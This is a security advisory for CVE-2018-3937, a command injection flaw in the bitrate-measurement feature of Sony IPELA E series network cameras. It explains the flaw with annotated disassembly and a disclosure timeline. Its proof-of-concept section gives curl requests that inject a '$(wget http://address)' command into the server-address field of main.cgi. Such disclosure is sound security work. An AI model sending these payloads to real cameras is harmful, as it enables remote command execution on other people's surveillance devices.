Sony IPELA E Series Camera measurementBitrateExec command injection vulnerability(CVE-2018-3937)

### Summary An exploitable command injection vulnerability exists in the measurementBitrateExec functionality of Sony IPELA E Series Network Camera. A specially crafted GET request can cause arbitrary commands to be executed. An attacker can send an HTTP request to trigger this vulnerability. ### Tested Versions Sony IPELA E series G5 firmware 1.87.00 ### Product URLs Firmware ### CVSSv3 Score 9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H ### CWE CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') ### Details Sony IPELA Cameras are network facing cameras used for monitoring and surveillance. In order to measure network performance, the camera leverages iperf. While building the iperf command, a specific payload can be sent to the main.cgi in order to turn on performance measuring for UDP or TCP traffic: ``` measurement=bitrate,client,8.8.8.8,udp,123 measurement=bitrate,client,8.8.8.8,tcp,123 ``` This string is parsed by main.cgi by finding the client substring and splitting at the comma: ``` 0x0000aa48 0400a0e1 mov r0, r4 ; Input String 0x0000aa4c cc159fe5 ldr r1, [pc, 0x5cc] ; [0xb020:4]=0xd298 str.client 0x0000aa50 0620a0e3 mov r2, 6 0x0000aa54 a9fdffeb bl sym.imp.strncasecmp 0x0000aa58 000050e3 cmp r0, 0 0x0000aa5c acffff1a bne 0xa914 0x0000aa60 0400a0e1 mov r0, r4 0x0000aa64 0710a0e1 mov r1, r7 0x0000aa68 2c20a0e3 mov r2, 0x2c ; ',' 0x0000aa6c c4fdffeb bl sym.g5::libcgi::LibCGI::split_element ``` Subsequently, parsing the server address is done by using find to locate the next comma and extracting the string between the comma after client. ``` 0x0000aa98 0400a0e1 mov r0, r4 0x0000aa9c 0c3086e2 add r3, r6, 0xc 0x0000aaa0 94308de5 str r3, [sp, 0x94] 0x0000aaa4 7c159fe5 ldr r1, [pc, 0x57c] ; [0xb028:4]=0xd2a0 "," 0x0000aaa8 0020a0e3 mov r2, 0 0x0000aaac 0130a0e3 mov r3, 1 0x0000aab0 71fdffeb bl sym.std::string::find ; Find the comma after the server address 0x0000aab4 010070e3 cmn r0, 1 0x0000aab8 0040a0e1 mov r4, r0 0x0000aabc 3e00000a beq 0xabbc 0x0000aac0 90508de2 add r5, sp, 0x90 0x0000aac4 0500a0e1 mov r0, r5 0x0000aac8 98109de5 ldr r1, [sp, 0x98] 0x0000aacc a6208de2 add r2, sp, 0xa6 0x0000aad0 7efdffeb bl sym.std::basic_string_char_std::char_traits_char__std::allocator_char__::basic_string 0x0000aad4 0510a0e1 mov r1, r5 0x0000aad8 0430a0e1 mov r3, r4 0x0000aadc 94008de2 add r0, sp, 0x94 0x0000aae0 0020a0e3 mov r2, 0 0x0000aae4 73fdffeb bl sym.std::string::append ``` The above parsing results in the following commands: ``` UDP: sh -c /usr/local/bin/iperf -c 8.8.8.8 -u -b 123K -x CD > /dev/null & TCP: /usr/local/bin/iperf -c 8.8.8.8 -F /tmp/MeasurementBitrateData -n 1 > /dev/null & ``` While parsing the input measurement string, there isn't a check on the server address (-c). In this manner, any string can be placed as the server address and will be executed via system. Knowing this, an attacker can execute arbitrary commands in the position of the server address. ### Exploit Proof of Concept ``` UDP: curl --data "measurement=bitrate,client,1.2.3.4\$(wget http://address),udp,123" http://camera-address/command/main.cgi TCP: curl --data "measurement=bitrate,client,1.2.3.4\$(wget http://address),tcp,123" http://camera-address/command/main.cgi ``` ### Timeline * 2018-06-04 - Vendor disclosure * 2018-07-19 - Vendor patched * 2018-07-20 - Public release